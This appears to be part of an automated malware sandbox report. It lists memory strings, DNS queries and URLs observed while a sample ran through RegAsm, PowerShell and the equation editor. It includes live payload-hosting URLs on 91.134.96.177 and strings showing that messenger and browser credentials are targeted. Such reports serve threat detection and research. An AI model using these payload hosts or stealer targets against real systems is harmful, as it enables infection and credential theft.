                  Source: RegAsm.exe, 00000012.00000002.453958713.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.453958713.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: RegAsm.exe, 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: RegAsm.exe, 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global traffic | DNS traffic detected: DNS query: og1.in
                  Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
                  Source: global traffic | DNS traffic detected: DNS query: maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro
                  Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 14:24:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closecontent-security-policy: default-src 'none'strict-transport-security: max-age=15552000; includeSubDomainsx-content-type-options: nosniffx-dns-prefetch-control: offx-download-options: noopenx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BEDnYP2a2eWLiLrKs9YJnu3mWIgCiF2subT99aKzhKPzYf0hTkAp%2BDWePLXPVtmBYN5XRFiEPyhP56mSGe2KFWViHcbBotu8ZICa0e8yFyOOA2PbwqP5xUk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8cb4e0316c2141cd-EWR
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 14:24:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closecontent-security-policy: default-src 'none'strict-transport-security: max-age=15552000; includeSubDomainsx-content-type-options: nosniffx-dns-prefetch-control: offx-download-options: noopenx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2NRKoUHUfmwUlOfnRKK1g5ZJQMjYMlATd0rHuiKHyLok3qZv84ugmaFM%2BKhKwZ9DBqhGYoKLtobw1uLfGvPHk7T3nqN3LheJooVVDhypdxPHxk%2FckOexKUQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8cb4e039ca8c431f-EWR
                  Source: powershell.exe, 0000000C.00000002.443014450.00000000024F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.134.96.177
                  Source: powershell.exe, 0000000C.00000002.443014450.00000000024F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.96.177/80/WRRDFC.txt
                  Source: EQNEDT32.EXE, 00000008.00000002.424729552.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.134.96.177/80/picturewithherimagesverygoodforyourheart.tIF
                  Source: EQNEDT32.EXE, 00000008.00000002.424729552.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.134.96.177/80/picturewithherimagesverygoodforyourheart.tIFj
                  Source: uc on 91.134.96.177.url.0.drString found in binary or memory: http://91.134.96.177/80/uc/
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                  Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.953027155.0000000000835000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.953097614.0000000000885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                  Source: powershell.exe, 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: powershell.exe, 0000000C.00000002.443014450.000000000258B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                  Source: powershell.exe, 0000000C.00000002.442724340.000000000003A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c9V
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                  Source: bhvC227.tmp.20.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                  Source: bhvC227.tmp.20.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: powershell.exe, 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                  Source: powershell.exe, 0000000A.00000002.450223595.0000000002440000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.443014450.0000000002251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
